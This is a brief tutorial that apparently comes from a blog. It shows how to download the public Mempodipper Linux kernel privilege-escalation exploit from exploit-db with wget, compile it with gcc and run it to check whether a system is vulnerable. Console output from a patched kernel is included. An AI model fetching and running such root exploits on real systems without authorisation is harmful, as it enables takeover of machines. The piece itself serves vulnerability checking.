This source is written in c and it require some level of understanding into linux system as well. You should find explanation for the source mempodipper.c here. But it has since been fix in this patch. So all of the distribution should have this fix in the kernel anyway. But in case you run at old system with kernel 2.6.39 or a non stock kernel, then you might want to read more.
With that said, let's download this source and compile it.
user@localhost:~$ wget http://www.exploit-db.com/download/18411 -O 18411.c
--2014-07-19 16:52:59-- http://www.exploit-db.com/download/18411
Resolving www.exploit-db.com (www.exploit-db.com)... 188.8.131.52, 184.108.40.206
Connecting to www.exploit-db.com (www.exploit-db.com)|220.127.116.11|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/18411/ [following]
--2014-07-19 16:53:00-- http://www.exploit-db.com/download/18411/
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 6348 (6.2K) [application/txt]
Saving to: ‘18411.c’
100%[====================================================================================================================>] 6,348 --.-K/s in 0.001s
2014-07-19 16:53:00 (7.31 MB/s) - ‘18411.c’ saved [6348/6348]
user@localhost:~$ gcc 18411.c -o 18411
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7398/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x4022c0.
[+] Calculating su padding.
[+] Seeking to offset 0x4022a6.
[+] Executing su with shellcode.
So we have downloaded the source, compile it using gcc and run it. If you notice in the video, if the kernel are vulnerable to this exploit, this exploit will finish run successfully and issue the command whoami, root is shown. But for this example above, my kernel is compiled with the fix so the computer system is safe. You can get this library and copy to the server you want to check to make sure the exploit did not run successfully.
That's it for this article, I hope you enjoy this writing.